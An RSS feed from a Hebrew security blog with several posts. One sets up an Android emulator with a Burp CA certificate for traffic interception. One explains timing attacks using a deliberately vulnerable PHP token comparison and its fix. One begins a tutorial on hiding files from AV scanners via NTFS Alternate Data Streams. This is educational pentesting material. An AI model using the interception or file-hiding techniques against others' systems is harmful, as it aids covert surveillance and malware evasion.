<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>גיבוב ממולח</title>
	<atom:link href="https://www.saltedhash.co.il/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.saltedhash.co.il</link>
	<description>בלוג אבטחת מידע</description>
	<lastBuildDate>Sun, 26 Aug 2018 18:32:56 +0000</lastBuildDate>
	<language>he-IL</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.8.13</generator>
	<item>
		<title>עבודה עם אנדרואיד &#8211; התקנת אמולטור</title>
		<link>https://www.saltedhash.co.il/blog/android-emulator-installing/</link>
					<comments>https://www.saltedhash.co.il/blog/android-emulator-installing/#respond</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Sun, 26 Aug 2018 18:32:05 +0000</pubDate>
				<category><![CDATA[בדיקות חדירות]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[אמולטור]]></category>
		<category><![CDATA[אנדרויד]]></category>
		<category><![CDATA[פרוקסי]]></category>
		<guid isPermaLink="false">https://www.saltedhash.co.il/?p=1026</guid>

					<description><![CDATA[<p>פוסט זה נועד להיות בעיקר תזכורת לעצמי לגבי תהליך התקנת האמולטור של אנדרואיד, הגדרות בסיסיות, והתקנה של אפליקציות. מקווה שהפוסט גם יעזור [&#8230;]</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/android-emulator-installing/">עבודה עם אנדרואיד – התקנת אמולטור</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>פוסט זה נועד להיות בעיקר תזכורת לעצמי לגבי תהליך התקנת האמולטור של אנדרואיד, הגדרות בסיסיות, והתקנה של אפליקציות. מקווה שהפוסט גם יעזור לאנשים אחרים, שרק מתחילים את דרכם בביצוע בדיקות חדירות לאנדרואיד.</strong></p>
<p>אילוצים:</p>
<ul>
<li>התקנת האמולטור והקבצים הנחוצים להרצת האפליקציות בלבד. כלומר, ללא Android Studio, שמאפשר לבצע כל זה עם GUI, אבל חוץ מזה לא נדרש וסתם שוקל הרבה.</li>
<li>סביבת העבודה &#8211; Linux. אבל התהליך דיי דומה ל-Windows.</li>
</ul>
<h2>הורדה והתקנת האמולטור של אנדרואיד</h2>
<p>בעמוד <a href="https://developer.android.com/studio/#downloads">https://developer.android.com/studio/#downloads</a> מופיעים הקישורים להורדת כלים ל- SDK (בחלק של Command line tools only). לאחר ההורדה, כדאי לחלץ את ה- zip (תיקיית tools שבפנים) לתיקיה ייעודית, מכיוון שיהיו הורדות נוספות. לצורך הדגמה יצרתי תיקיה ‎~/android-sdk .</p>
<p>לאחר מכן, צריך להתקין חבילות נוספות &#8211; adb, system images, ועוד. נעבור לתיקיית bin, שבה נמצא sdkmanager:</p>
<p><code>cd ~/android-sdk/tools/bin</code></p>
<p>רשימת חבילות זמינות להתקנה:</p>
<p>‎ <code>sdkmanager --list</code></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/sdkmanager-list.png"><img loading="lazy" class="aligncenter size-full wp-image-1029" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/sdkmanager-list.png" alt="sdkmanager --list" width="489" height="343" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/sdkmanager-list.png 489w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/sdkmanager-list-300x210.png 300w" sizes="(max-width: 489px) 100vw, 489px" /></a>החבילה הראשונה שכדאי להתקין זה platform tools, הכוללת adb. אותה צריך להתקין רק פעם אחת.</p>
<p><code>sdkmanager "platform-tools"‎</code></p>
<p>לאחר מכן, התקנת ה- system image לגרסת אנדרואיד הנדרשת. אפשר לחשוב על זה כעל מכונות וירטואליות שהאמולטור מריץ. ישנם גם גרסאות של Android Wear ו- Android TV. בהדגמה זו אני מתקין API בגרסה 26 (אנדרואיד 8.0) ללא Play Store. אני חושב שהדגמה זו תהיה הכי שימושית, מכיוון שלא כל הגרסאות של system image מכילות Play Store. לפעמים הבדיקה דורשת גרסת אנדרואיד מסוימת, ולכן יהיה שימושי לדעת איך להתקין Play Store בצורה ידנית, אם יהיה צורך להוריד אפליקציות דרכו.</p>
<p><code>sdkmanager "system-images;android-26;google_apis;x86_64"‎</code></p>
<p>והשלב האחרון &#8211; יצירת המכונה (AVD &#8211; Android Virtual Device) להרצה באמולטור. נקרא למכונה test1 לצורך הדגמה.</p>
<p style="text-align: right"><code>avdmanager create avd -n test1 -k "system-images;android-26;google_apis;x86_64"‎</code></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avdmanager-create.png"><img loading="lazy" class="aligncenter size-full wp-image-1033" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avdmanager-create.png" alt="avdmanager create" width="752" height="52" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avdmanager-create.png 752w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/avdmanager-create-300x21.png 300w" sizes="(max-width: 752px) 100vw, 752px" /></a>שווה לערוך קובץ ההגדרות של AVD שיצרנו:</p>
<p>‎~/.android/avd/test1.avd/config.ini</p>
<p>הדבר הראשון שאני תמיד מוסיף, זה אפשרות לבצע שיתוף clipboard בין המכונה ל- host:</p>
<p><code>hw.keyboard=yes</code></p>
<p>לפעמים גם נדרש להגדיל כמות הזכרון:</p>
<p><code>hw.ramSize=1024</code></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avd-config.png"><img loading="lazy" class="aligncenter size-full wp-image-1034" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avd-config.png" alt="AVD config" width="539" height="165" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/avd-config.png 539w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/avd-config-300x92.png 300w" sizes="(max-width: 539px) 100vw, 539px" /></a>רשימת כל ה- AVD המותקנים:</p>
<p><code>avdmanager list avd</code></p>
<h2>הרצת האמולטור של אנדרואיד</h2>
<p>מעבר לתיקיה של האמולטור: <code>cd ~/android-sdk/emulator</code></p>
<p>הפעלת AVD לפי שם: <code>emulator -avd test1</code></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator.png"><img loading="lazy" class="aligncenter size-full wp-image-1036" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator.png" alt="Android Emulator" width="395" height="545" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator.png 395w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-217x300.png 217w" sizes="(max-width: 395px) 100vw, 395px" /></a>במידה והאמולטור קורס ומקלל משהו לגבי libGL, אפשר לנסות להריץ האמולטור עם דגל <code>‎-use-system-libs</code>. זה יגרום לאמולטור להשתמש בספריה libstdc++‎ של המערכת הפעלה ולא אחת שמגיעה עם האמולטור.</p>
<p>דגל שימושי נוסף (בהמשך) הנו ‎<code>-writable-system</code>, המאפשר לערוך את המחיצת ה- system של AVD.</p>
<h2>התקנת Play Store</h2>
<p>Android Debug Bridge (או בקיצור ADB) מאפשר לתקשר עם AVD מה- host. לדוגמה, להתקין אפליקציות, להעביר קבצים, לראות לוגים, לקבל shell, ועוד. במכונה שיצרנו לא קיים Play Store; נתקין אותו (ללא Google services נוספים) ידנית באמצעות ADB.</p>
<p>קודם צריך להוריד את קבצי האפליקציה מהאתר <a href="https://opengapps.org" target="_blank" rel="noopener">https://opengapps.org</a>. שם צריך לבחור את החבילה שמתאימה לגרסת האנדרואיד והפלטפורמה. בדוגמה זו הפלטפורמה הנה x64 ואנדרואיד גרסה 8.0. כמו כן, החבילה להורדה תהיה pico, מכיוון שצריך רק את Play Store.</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/opengapps-download.png"><img loading="lazy" class="aligncenter size-full wp-image-1039" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/opengapps-download.png" alt="Open GApps download" width="343" height="707" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/opengapps-download.png 343w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/opengapps-download-146x300.png 146w" sizes="(max-width: 343px) 100vw, 343px" /></a>לאחר מכן, צריך לחלץ את הקובץ Phonesky.apk שנמצא בנתיב הבא בתוך ה- zip שירד:</p>
<p><code>Core/vending-x86_64.tar.lz/vending-x86_64/240-320-480/priv-app/Phonesky/Phonesky.apk</code></p>
<p>מכיוון שמדובר על התקנה ידנית של אפליקציה למחיצת ה- system, צריך להפעיל את האמולטור עם אפשרות כתיבה למחיצה זו.</p>
<p><code>emulator -avd test1 -writable-system</code></p>
<p><strong>התקנת Phonesky.apk</strong></p>
<p><code>cd ~/android-sdk/platform-tools/‎</code><br />
החלפה למשתמש root:<br />
<code>adb root</code><br />
טיעינת המחיצה מחדש כדי לקבל הרשאות כתיבה:<br />
<code>adb remount</code><br />
כניסה לשורת פקודה באנדרואיד:<br />
<code>adb shell</code><br />
יצירת תיקיה ל- Play Store:<br />
<code>mkdir /system/priv-app/Phonesky</code><br />
יציאה משורת פקודה:<br />
<code>exit</code><br />
העתקת קובץ האפליקציה:<br />
<code>adb push ~/Phonesky.apk /system/priv-app/Phonesky/‎</code></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/install-phonesky.png"><img loading="lazy" class="aligncenter size-full wp-image-1041" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/install-phonesky.png" alt="Install Phonesky.apk" width="490" height="161" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/install-phonesky.png 490w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/install-phonesky-300x99.png 300w" sizes="(max-width: 490px) 100vw, 490px" /></a></p>
<p>לאחר מכן צריך להפעיל את Android Shell מחדש:<br />
<code>adb shell stop</code><br />
<code>adb shell start</code></p>
<p>עכשיו יש Play Store מותקן:</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/phonesky-installed.png"><img loading="lazy" class="aligncenter size-full wp-image-1042" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/phonesky-installed.png" alt="Phonesky installed" width="320" height="480" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/phonesky-installed.png 320w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/phonesky-installed-200x300.png 200w" sizes="(max-width: 320px) 100vw, 320px" /></a></p>
<p>חשוב להדגיש, שזו לא הדרך הנכונה כדי להתקין אפליקציות רגילות, אלא רק מה שנמצא במחיצת system. אפליקציות רגילות אפשק להתקין בקלות עם הפקודה <code>adb install test.apk</code>.</p>
<p>במידה ומשהו השתבש, אפשר לצפות בלוגים עם הפקודה <code>adb logcat</code>.</p>
<h2>הגדרת HTTP proxy ו- GPS</h2>
<p>את כתובת הפרוקסי אפשר להגדיר ב- GUI של האמולטור (מסך Settings, לשונית Proxy), או להפעיל את האמולטור עם הדגל ‎<code>-http-proxy &lt;host:port&gt;‎</code>.</p>
<p>השלב הבא הוא התקנת תעודת CA של הפרוקסי. ללא התעודה לא יעבדו שירותים של גוגל, חיבור מייל ועוד. לדוגמה, לא תהיה אפשרות להתקין אפליקציות מ- Play Store.</p>
<p>הזהרה: לא ניתן להשתמש בשלב זה ב- OWASP ZAP בגלל האופן שבו עובד האמולטור של אנדרואיד עם הגדרת פרוקסי. בניסיון התחברות לשרת, האמולטור מציב את כתובת ה- IP של השרת בפקודת HTTP CONNECT, במקום להציב שם את ה- hostname. בתורו ZAP מג'נרט את תעודת SSL עם כתובת IP בשדה Issued to של התעודה. וזה כמובן גורם לתעודה להיות לא תקינה, מכיוון שכתובת ה- IP שונה מה- hostname. זו תקלה בצד האמולטור, ולא של ZAP, שעובד כצפוי. הנה דוגמה לניסיונות התחברות כושלים לשרתים של גוגל, מכיוון שהתעודה לא תקנית. שימו לב שבפקודת CONNECT רשומה כתובת IP ולא hostname.</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/emulator-proxy-connect.png"><img loading="lazy" class="aligncenter size-full wp-image-1043" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/emulator-proxy-connect.png" alt="Android emulator proxy HTTP CONNECT" width="382" height="87" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/emulator-proxy-connect.png 382w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/emulator-proxy-connect-300x68.png 300w" sizes="(max-width: 382px) 100vw, 382px" /></a>כשנתקלתי בתקלה זו בפעם הראשונה, קודם כל בדקתי מה יקרה בעבודה דרך burp. הופתעתי לגלות ש- burp יודע להתמודד עם המצב ומייצר תעודה דיגיטלית תקנית גם עם בפקודת HTTP CONNECT רשומה כתובת IP. הנחתי שהוא לוקח את ה- hostname ממקום אחר. הלכתי לערוץ של burp ב- IRC כדי לקבל ייעוץ. מסתבר שהמפתחים של burp כבר מכירים את הבעיה וטיפלו בה:</p>
<p dir="ltr">&lt;pajswigger&gt; We fixed this a few versions back, now if Burp sees an IP address in the CONNECT header, it sniffs the SNI to determine the domain name</p>
<p>נעבוד עם burp אם כך. שלב ראשון &#8211; ייצוא תעודת CA של burp:</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/burp-export-ca.png"><img loading="lazy" class="aligncenter size-full wp-image-1044" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/burp-export-ca.png" alt="Burp export CA certificate" width="966" height="713" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/burp-export-ca.png 966w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/burp-export-ca-300x221.png 300w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/burp-export-ca-768x567.png 768w" sizes="(max-width: 966px) 100vw, 966px" /></a>שלב שני &#8211; העתקת התעודה לאמולטור:</p>
<p><code>cd android-sdk/platform-tools/‎</code><br />
<code>adb push burp.cer /sdcard</code></p>
<p>שלב שלישי &#8211; ייבוא התעודה. אנדרואיד יבקש להגדיר PIN לפני התקנת תעודה דיגיטלית, ויבדוק אותו במידה ונרצה להתקין תעודות נוספות.</p>
<p>&nbsp;</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-1.png"><img loading="lazy" class="aligncenter size-full wp-image-1045" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-1.png" alt="" width="320" height="480" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-1.png 320w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-1-200x300.png 200w" sizes="(max-width: 320px) 100vw, 320px" /></a></p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-2.png"><img loading="lazy" class="aligncenter size-full wp-image-1046" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-2.png" alt="" width="320" height="480" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-2.png 320w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-install-ca-2-200x300.png 200w" sizes="(max-width: 320px) 100vw, 320px" /></a>עכשיו הפרוקסי מייצר תעודות תקינות</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-ca-portswigger.png"><img loading="lazy" class="aligncenter size-full wp-image-1048" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-ca-portswigger.png" alt="PortSwigger CA" width="320" height="480" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-ca-portswigger.png 320w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-ca-portswigger-200x300.png 200w" sizes="(max-width: 320px) 100vw, 320px" /></a>והאמולטור מעביר תעבורה דרך פרוקסי באופן תקני:</p>
<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-proxy-burp.png"><img loading="lazy" class="aligncenter size-full wp-image-1049" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-proxy-burp.png" alt="Android emulator burp proxy" width="735" height="555" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-proxy-burp.png 735w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-proxy-burp-300x227.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></a>את הקואורדינטות GPS ניתן לשנות בהגדרות האמולטור. זה מאוד שימושי לבדיקת אפליקציות הקשורות למיקום.</p>
<h2><a href="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-change-gps-coordinates.png"><img loading="lazy" class="aligncenter size-full wp-image-1050" src="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-change-gps-coordinates.png" alt="Android emulator change GPS coordinates" width="820" height="648" srcset="https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-change-gps-coordinates.png 820w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-change-gps-coordinates-300x237.png 300w, https://www.saltedhash.co.il/wp-content/uploads/2018/08/android-emulator-change-gps-coordinates-768x607.png 768w" sizes="(max-width: 820px) 100vw, 820px" /></a>מחיקת AVD</h2>
<p><code>avdmanager delete avd -n test1</code></p><p>The post <a href="https://www.saltedhash.co.il/blog/android-emulator-installing/">עבודה עם אנדרואיד – התקנת אמולטור</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/android-emulator-installing/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>חשיבה מאובטחת</title>
		<link>https://www.saltedhash.co.il/blog/secure-thinking/</link>
					<comments>https://www.saltedhash.co.il/blog/secure-thinking/#respond</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Fri, 02 Jan 2015 12:26:36 +0000</pubDate>
				<category><![CDATA[פיתוח מאובטח]]></category>
		<category><![CDATA[timing attack]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=975</guid>

					<description><![CDATA[<p>מתכנת אבטחה כמקצוע מוכר!</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/secure-thinking/">חשיבה מאובטחת</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>לאחרונה נתקלתי במספר פוסטים בנושא timing attack. מתקפה זו אינה חדשה וגם לא מתוחכמת מדי. לטעמי היא גם לא שימושית לרוב, אך אני רוצה להשתמש בה כדוגמה לאחת הסיבות לעובדה, שמרבית המערכות אינן secure by design.</p>
<h2>מה זה timing attack</h2>
<p><strong>מתקפת תזמון</strong> זו מתקפה מסוג side channel, המנצלת את אופן פעולת אלגוריתם אבטחה, על מנת לגלות מידע שימושי או סוד כלשהו. במילים פשוטות, לדוגמה, לגלות סיסמה תו אחר תו, בהתבסס על זמני תגובת המערכת. נניח שהמתכנת מימש מנגנון tokens באתר כחלק מתהליך הזדהות משתמשים. זו פיסת הקוד PHP שהוא כתב, הבודקת את ערך ה- token שהמשתמש שלך לאתר:</p>
<pre dir="ltr"><code>$token = get_user_token_from_db();
return ($token === $_SESSION["token"]);</code></pre>
<p>עם שימוש בקוד זה, זמן תגובת השרת ישתנה בהתאם לכמות התווים הנכונים שהמשתמש שלך בערך ה- token (אורך המחרוזת ידוע מראש). זה מכיוון שהשוואת מחרוזות מתבצעת תו מול תו, או יותר נכון בית מול בית, מכיוון שב- PHP השוואת המחרוזות בפועל עובדת עם memcmp. לכן, ההשוואה צריכה להתבצע בצורה הבאה:</p>
<pre dir="ltr"><code>$token = get_user_token_from_db();
$len = strlen($token);

if ($len !== strlen($_SESSION["token"])) {
    return false;
}

$result = 0;

for ($i = 0; $i &lt; $len; $i++) {
    // ord returns ASCII value of a char
    $result |= (ord($token[$i]) ^ ord($_SESSION["token"][$i]));
}

return 0 === $result;</code></pre>
<p>או במקרה של PHP עם פונקציה <a title="hash_equals" href="http://php.net/manual/en/function.hash-equals.php" target="_blank">hash_equals</a> הממומשת בדיוק כך. קוד זה יבטיח שזמן תגובת השרת לא יושפע מאורך התווים הנכונים.</p>
<h2>מתכנת אבטחה</h2>
<p>מימוש אבטחה חייב להתבצע עם חשיבה שונה מפיתוח כל פונקציונליות אחרת. במקרה של timing attack, המתכנת צריך לממש בדיקת ערך קריפטוגרפי כלשהו ואינו חושב על זה בצורה שונה <span style="text-decoration: underline;">מהשוואה רגילה של מחרוזות</span>. תיקון פערי אבטחה עולה יותר כסף וזמן ככל שהתיקון מתבצע מאוחר יותר, בדיוק כמו עם באגים. אמנם רמת המודעות של המתכנתים עלתה ונהיה יותר קשה לנצל XSS או SQLi (לא באמת&#8230; למי אני משקר?), אבל אם אנשי אבטחה אינם מעורבים בתהליך הפיתוח ואינם מבצעים סקירות קוד, פערים כמו timing attack יישארו וקטור תקיפה לא מבוטל.</p>
<p>לכן, מימוש מנגנוני אבטחה חייב להתבצע ע&quot;י מתכנת אבטחה, בדיוק כמו שיש מתכנת צד לקוח, מתכנת צד שרת, מתכנת API ומתכנת בסיס נתונים.</p><p>The post <a href="https://www.saltedhash.co.il/blog/secure-thinking/">חשיבה מאובטחת</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/secure-thinking/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>אבטחה בסגנון ישראלי</title>
		<link>https://www.saltedhash.co.il/blog/israel-security/</link>
					<comments>https://www.saltedhash.co.il/blog/israel-security/#respond</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Fri, 17 Oct 2014 14:33:46 +0000</pubDate>
				<guid isPermaLink="false">http://www.saltedhash.co.il/?p=960</guid>

					<description><![CDATA[<p>קרדיט: דמיטרי פרץ.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/israel-security/">אבטחה בסגנון ישראלי</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><a href="https://www.saltedhash.co.il/wp-content/uploads/2014/10/ribono_security.jpg"><img loading="lazy" class="aligncenter size-full wp-image-963" src="https://www.saltedhash.co.il/wp-content/uploads/2014/10/ribono_security.jpg" alt="אבטחה ריבונו של עולם" width="1366" height="768" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/10/ribono_security.jpg 1366w, https://www.saltedhash.co.il/wp-content/uploads/2014/10/ribono_security-300x168.jpg 300w, https://www.saltedhash.co.il/wp-content/uploads/2014/10/ribono_security-1024x575.jpg 1024w" sizes="(max-width: 1366px) 100vw, 1366px" /></a></p>
<p>קרדיט: <a title="דמיטרי פרץ" href="https://www.linkedin.com/in/dmitryperets" target="_blank" rel="noopener">דמיטרי פרץ</a>.</p><p>The post <a href="https://www.saltedhash.co.il/blog/israel-security/">אבטחה בסגנון ישראלי</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/israel-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>שלוש דרכים מתקדמות להסתיר קבצים ב- Windows</title>
		<link>https://www.saltedhash.co.il/blog/three-ways-to-hide-malware/</link>
					<comments>https://www.saltedhash.co.il/blog/three-ways-to-hide-malware/#comments</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Thu, 29 May 2014 19:01:16 +0000</pubDate>
				<category><![CDATA[הנדסה הפוכה ופורנזיקס]]></category>
		<category><![CDATA[ADS]]></category>
		<category><![CDATA[VSC]]></category>
		<category><![CDATA[VSS]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WMIC]]></category>
		<category><![CDATA[הסתרת מידע]]></category>
		<category><![CDATA[פורנזיקס]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=928</guid>

					<description><![CDATA[<p>נושא הסתרת הקבצים מעורר עניין לא רק אצל ילדים סקרנים שרוצים לשמור את ספריית הסרטים שלהם בסוד מההורים, אלא גם חוקרי אבטחת מידע, כותבי סוסים טרויאנים ואנשי פורנזיקס. אדגים 3 שיטות כיצד להחביא קבצים מהמשתמשים ומהסורקים של AV, וגם אסביר למה WMIC זה חשוב.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/three-ways-to-hide-malware/">שלוש דרכים מתקדמות להסתיר קבצים ב- Windows</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>נושא הסתרת הקבצים מעורר עניין לא רק אצל ילדים סקרנים שרוצים לשמור את ספריית הסרטים שלהם בסוד מההורים, אלא גם חוקרי אבטחת מידע, כותבי סוסים טרויאנים ואנשי פורנזיקס. אדגים 3 שיטות כיצד להחביא קבצים מהמשתמשים ומהסורקים של AV, וגם אסביר למה WMIC זה חשוב.</strong></p>
<p>אתם יודעים למה אני לא אוהב את Windows? האמת שבעצמי לא ידעתי לתת תשובה מעמיקה תקופה דיי ארוכה, אבל תמיד ידעתי את זה מאז שעשיתי פירמוט בפעם השלישים בשנה (עוד בתקופת Win98). רק לאחר שיצא לי לעבוד עם המבנה הפנימי של Windows בתחום האבטחה, הבנתי מה הפריע לי כל השנים האלה! הסיבוכיות של המערכת! זה נשמע מוזר, אבל ואני לא מדבר על הידידותיות למשתמש, אלא הארכיטקטורה הפנימית וה- <a title="Feature creep" href="https://en.wikipedia.org/wiki/Feature_creep" target="_blank">Feature creep</a>. מערכת זו היא דוגמה טובה לעקרון <a title="There Is More Than One Way To Do It" href="https://en.wikipedia.org/wiki/There's_more_than_one_way_to_do_it" target="_blank">TIMTOWTDI</a> המוכר מ- Perl. לכל חלק במערכת אפשר לגשת במספר דרכים שונות ולפעמים משונות. זה יוצר חוסר אחידות, ולפי דעתי אחת הסיבות למה Windows כ&quot;כ פרוצה – כי כשיש עשר דרכים לעשות אותו הדבר, קשה להגן על כולן.<br />
הנה דוגמה. בשלושת השיטות במאמר זה אשתמש בגישה לקבצים באמצעות ה- <a title="Universal Naming Convention" href="https://en.wikipedia.org/wiki/Path_(computing)#UNC_in_Windows" target="_blank">UNC</a>. ב- Windows אפשר לגשת לקבצים בשיטה מימי ה- DOS, כלומר הדרך הסטנדרטית (c:\temp\somefile) ואפשר באמצעות נתיב מיוחד שמתחיל ב- \\. חלק מהפקודות ב- Windows יודעות לעבוד עם ה- UNC, חלק לא, וחלק רק עם נתיבים מסוימים ב- UNC. בקיצור, חוסר אחידות ובלאגן.</p>
<h2>1. Alternate Data Stream</h2>
<p>נתחיל מחימום קל. ADS הוא פיצ'ר של NTFS, שאמור להיות מוכר לכל מי שעסק בסיסטם, התעניין במערכות קבצים והמבנה הפנימי של Windows, או אבטחת מידע באופן כללי. הפיצ'ר מאפשר לשייך יותר מ- data stream אחד לרשומה במערכת קבצים. כלומר, לשם קובץ מסוים ניתן לקשר יותר מאוסף מידע אחד.</p>
<p>נניח שקיים קובץ תמונה: c:\temp\hello.jpg</p>
<p>ניתן לקשר אליו תוכן נוסף, כך שיהיה זמין בנתיב מיוחד הבא, לדוגמה: c:\temp\hello.jpg:world</p>
<p>זה data stream בשם &quot;world&quot; בתוך הקובץ &quot;hello.jpg&quot;. כעת אפשר לכתוב ולקרוא מה- data stream הזה. בעצם, בפתיחת הקובץ ב- NTFS, תמיד פונים ל- data stream הראשון (הדיפולטי), אלא אם כן מצוין אחרת. במקרה זה, הראשון הוא התמונה עצמה.</p>
<p>ניואנס אחד – רק תוכנות שמימשו טיפול ב- ADS יכולות לגשת ל- ADS. אם ננסה לקרוא קובץ בשם &quot;hello.jpg:world&quot; בתוכנה שאינה תומכת ב- ADS, זה ייכשל, מכיוון שהיא תנסה למצוא אותו על הדיסק, וקובץ בשם זה לא קיים. כלומר, העבודה עם ADS אפשרית או באמצעות כלים שתומכים בו, או באמצעות שימוש ב- Win32 API בקוד שלכם.</p>
<div id="attachment_931" style="width: 1034px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_notepad.png"><img aria-describedby="caption-attachment-931" loading="lazy" class="size-full wp-image-931" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_notepad.png" alt="Notepad with ADS" width="1024" height="673" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_notepad.png 1024w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_notepad-300x197.png 300w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-931" class="wp-caption-text">notepad יודע לטפל ב- ADS</p></div>
